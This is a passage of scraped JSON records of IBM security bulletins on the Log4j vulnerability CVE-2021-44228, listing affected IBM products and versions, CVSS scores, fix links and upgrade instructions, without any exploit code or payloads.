Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5FPD\",\"label\":\"IBM Cloud Private for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"IBM Cloud Private for Data System 2.0 - All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T11:35:02", "type": "ibm", "title": "Security Bulletin: Log4j vulnerability affects IBM Cloud Pak for Data System 2.0", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T11:35:02", "id": "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "href": "https://www.ibm.com/support/pages/node/6527310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:55", "description": "## Summary\n\nIBM Security Guardium has fixed this vulnerability \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Guardium| 10.5 \nIBM Security Guardium| 10.6 \nIBM Security Guardium| 11.0 \nIBM Security Guardium| 11.1 \nIBM Security Guardium| 11.2 \nIBM Security Guardium| 11.3 \nIBM Security Guardium| 11.4 \n \n## Remediation/Fixes\n\nProduct| Versions| Fix \n---|---|--- \nIBM Security Guardium| 10.5| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p546_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p546_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 10.6| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p684_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p684_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.0| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p41_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p41_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.1| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p151_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p151_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.2| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p264_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p264_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.3| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p346_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p346_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.4| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p404_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p404_CVE-2021-44228&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication \n16 Dec 2021: Second Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"10.5, 10.6, 11.0, 11.1, 11.2, 11.3, 11.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T20:46:58", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is vulnerable to a remote code execution vulnerability in log4j2 component", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T20:46:58", "id": "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "href": "https://www.ibm.com/support/pages/node/6527082", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:45", "description": "## Summary\n\nApache Log4j vulnerability associated with the Rational Performance Tester Apache JMeter\u2122 Test Extension impacts Rational Test Automation Server. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nRational Test Automation Server\n\n| Versions 10.0, 10.1, 10.2 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n \nCustomers with Rational Test Automation Server upgrade to version 10.2 then upgrade to version 10.2.1.1 from the entitlement registry\n\nInstructions for pulling upgraded images:\n\n * Installing on Ubuntu: <https://help.blueproddoc.com/rationaltest/rationaltestautomationserver/10.2.1/com.hcl.test.server.admin.doc/topics/t_install_ubuntu.html>\n * Installing on Red Hat OpenShift: <https://help.blueproddoc.com/rationaltest/rationaltestautomationserver/10.2.1/com.hcl.test.server.admin.doc/topics/t_install_openshift.html>\n\nNote: Although the Apache Log4j libraries installed with the Apache JMeter Test Extension are not loaded by Rational Test Automation Server, the presence of Log4j-core-2.11 may impact customers.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n27 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6QK3\",\"label\":\"IBM Rational Test Automation Server\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF031\",\"label\":\"Ubuntu\"},{\"code\":\"PF043\",\"label\":\"Red Hat\"}],\"Version\":\"10.0, 10.1, 10.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T10:42:18", "type": "ibm", "title": "Security Bulletin: Rational Test Automation Server is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-15T10:42:18", "id": "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "href": "https://www.ibm.com/support/pages/node/6541184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:06", "description": "## Summary\n\nLog4J is used by IBM App Connect Enterprise Certified Container for logging when generating a bar file that contains a JDBC connector and when running a flow that contains a JDBC connector. IBM App Connect Enterprise Certified Container Designer Authoring operands and Integration Server operands that use the JDBC connector may be vulnerable to remote code execution due to CVE-2021-44228. This bulletin provides patch information to address the reported Log4j vulnerability (CVE-2021-44228).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 1.1-eus with Operator \nApp Connect Enterprise Certified Container| 1.4 with Operator \nApp Connect Enterprise Certified Container| 1.5 with Operator \nApp Connect Enterprise Certified Container| 2.0 with Operator \nApp Connect Enterprise Certified Container| 2.1 with Operator \nApp Connect Enterprise Certified Container| 3.0 with Operator \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the operator and any DesignerAuthoring and IntegrationServer operands .\n\n**App Connect Enterprise Certified Container 1.4, 1.5, 2.0, 2.1 and 3.0 (Continuous Delivery)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 3.1.0 or higher, and ensure that all DesignerAuthoring and IntegrationServer components are at 12.0.3.0-r1 or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_cd?topic=releases-upgrading-operator>** \n**\n\nAlternatively you can update the operator version to 3.0.0 or higher, then apply a set of iFix images for the DesignerAuthoring and IntegrationServer operands. Instructions on upgrading the Operator and applying the iFix images for the Continuous Delivery release are available at <https://www.ibm.com/support/pages/node/6527178>\n\n**App Connect Enterprise Certified Container 1.1 EUS (Extended Update Support)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 1.1.5 or higher, and ensure that all DesignerAuthoring and IntegrationServer components are at 11.0.0.15-r1-eus or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_eus?topic=releases-upgrading-operator>\n\nAlternatively you can update to Operator version 1.1.4 or higher, then apply a set of iFix images for the DesignerAuthoring and IntegrationServer operands. Instructions on upgrading the Operator and applying the iFix images for the Continuous Delivery release are available at <https://www.ibm.com/support/pages/node/6527180>\n\n_Note: For other versions prior to 1.4 IBM strongly recommends upgrading to a supported level and following the instructions above for the Continuous Delivery versions_\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee <https://www.ibm.com/support/pages/node/6239294> for information supported levels of the ACE Certified Container Operator\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDR5J\",\"label\":\"IBM App Connect Enterprise\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.4, 1.5, 2.0, 2.1, 3.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T13:23:43", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container Designer Authoring operands and Integration Server operands that use the JDBC connector may be vulnerable to remote code execution due to CVE-2021-44228", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-31T13:23:43", "id": "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "href": "https://www.ibm.com/support/pages/node/6527794", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:47:37", "description": "## Summary\n\nIBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nOEM partner ThycoticCentrify, after conducting extensive research product code base, it is determined that **none** of the products outlined below are using the vulnerable Java library `log4j` with JNDI exploit (CVE-2021-44228). Additionally, **none** of the products outlined below are built on the Java programming language, preventing the library to be present.\n\n * IBM Security Verify Privilege Vault\n * IBM Security Verify Privilege Manager\n * IBM Security Verify Privilege Account Lifecycle Manager\n * IBM Security Verify Privilege Behavior Analytics\n * IBM Security Verify Privilege DevOps Vault\n * IBM Security Verify Privilege Vault Remote\n * IBM Security Verify Privilege Server Suite\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nhttps://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS2N2U\",\"label\":\"IBM Security Verify Privilege\"},\"ARM Category\":[],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:37:26", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:26", "id": "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "href": "https://www.ibm.com/support/pages/node/6525770", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:16", "description": "## Summary\n\nThere is a vulnerability in the version of Apache Log4j that was included in Cloud Pak for Data. This issue has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Data| 4.0 (all previous refreshes) \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Affected Product(s)**| **Version(s)**| **Remediation/Fix** \n---|---|--- \nCloud Pak for Data| 4.0 (all previous refreshes)| \n\n[4.0.4](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSHGYS\",\"label\":\"IBM Cloud Pak for Data\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"4.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T17:05:16", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability affects Cloud Pak for Data (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T17:05:16", "id": "5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "href": "https://www.ibm.com/support/pages/node/6529302", "cvss": {"score": 9.3, "vector": 